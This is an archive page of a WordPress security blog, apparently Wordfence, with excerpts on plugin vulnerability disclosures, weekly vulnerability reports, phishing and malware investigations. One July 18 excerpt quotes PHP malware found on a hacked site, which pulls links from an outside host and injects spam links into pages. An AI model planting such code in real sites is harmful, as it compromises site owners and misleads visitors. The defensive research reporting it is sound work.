Archive For: WordPress Security
-
August 1, 2023
On June 8, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in WebToffee’s Stripe Payment Plugin for WooCommerce plugin, which is actively installed on more than 10,000 WordPress websites. This vulnerability makes it possible for an attacker to gain access to the accounts of users... Read More
-
July 28, 2023
Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this... Read More
-
July 28, 2023
Earlier this week we became aware that malicious actors are using the Wordfence brand image to run a phishing scam on WordPress and Wordfence users, posing as unknown login notifications from their own website while linking to a fake login page, clearly aiming to steal WordPress login credentials. If you have received a suspicious email like... Read More
-
July 27, 2023
Last week, there were 62 vulnerabilities disclosed in 1035 WordPress Plugins and 90 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 36 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with... Read More
-
July 26, 2023
Website owners and developers tend to buy a lot of domains. With different projects on the go and working with multiple different clients at any given time it can be a challenge to keep track of all your inventory. Sadly, when old websites and domains get forgotten about they can be preyed upon by attackers... Read More
-
July 25, 2023
Even the most diligent site owners should consider when they had their last website security check. As our own research indicates, infections resulting from known website vulnerabilities continue to plague website owners. According to our 2022 Hacked Website Report, last year alone WordPress accounted for 96.2% of infected websites due to its market share and... Read More
-
July 20, 2023
We’ve all received spam and phishing emails — our inboxes are often full of them. They let us know that our package is being delivered (even when we haven’t ordered anything), provide details on our “recent” tax filing (that was completed months ago), and encourage us to act fast and enter our credit card —... Read More
-
July 20, 2023
Note: We accidentally sent out an email for this report with last week's subject line. Due to the subject line not being very different week to week for this report, we opted to just leave it as is and not send a follow-up email. We apologize for this error on our part! Last week, there... Read More
-
July 18, 2023
This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file: <?php $lines = file('https://4ip[.]su/db/links.txt'); shuffle($lines); $data = array_rand($lines, 900); echo '<p>'; foreach($data as $value) { $rand = substr(md5(microtime()),rand(0,26),6); echo '<a href="'.$lines[$value].'">'.$rand.'</a> ';... Read More
-
July 18, 2023
“Never Assume Anything” – that is the 4th Guiding Principle written in the Security section of the WordPress Common APIs Handbook for developers. When it comes to WordPress plugin security, assumptions can be dangerous. This became evident when the Wordfence Threat Intelligence team discovered an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in 14 different email... Read More